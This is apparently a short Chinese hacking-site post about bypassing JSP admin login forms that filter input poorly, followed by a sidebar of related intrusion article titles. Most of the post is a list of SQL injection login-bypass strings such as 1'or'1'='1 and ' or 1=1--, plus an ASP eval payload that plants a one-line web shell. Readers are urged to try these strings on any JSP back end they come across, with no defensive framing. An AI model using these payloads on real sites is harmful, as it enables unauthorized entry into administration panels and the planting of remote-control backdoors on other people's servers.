|
[推荐]jsp后台利用之过滤不严格字符
和曾经asp后台的弱口令('or''=')登陆一样,jsp的后台登陆中也存在着对字符过滤不严格,从而导致可以直接绕过登陆表单而直接进入后台.虽然利用的几率不如03,04年时期的asp后台利用那么大,可是无疑给我们的sentou加了把双刃剑
当遇到 jsp的后台时候,大家不妨试验下下面的,说不定会有以外收获 : )
用户名:1'or'1'='1
密码:1'or'1'='1
以下代码也是对付一些垃圾网站的
a":eval request(chr (35))//'
'or''='
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
| 没有路由密码权限时的鸽子上线方 | 08-23 |
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| sqlserver2005中恢复xp_cmdshell | 11-10 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |
您现在的位置: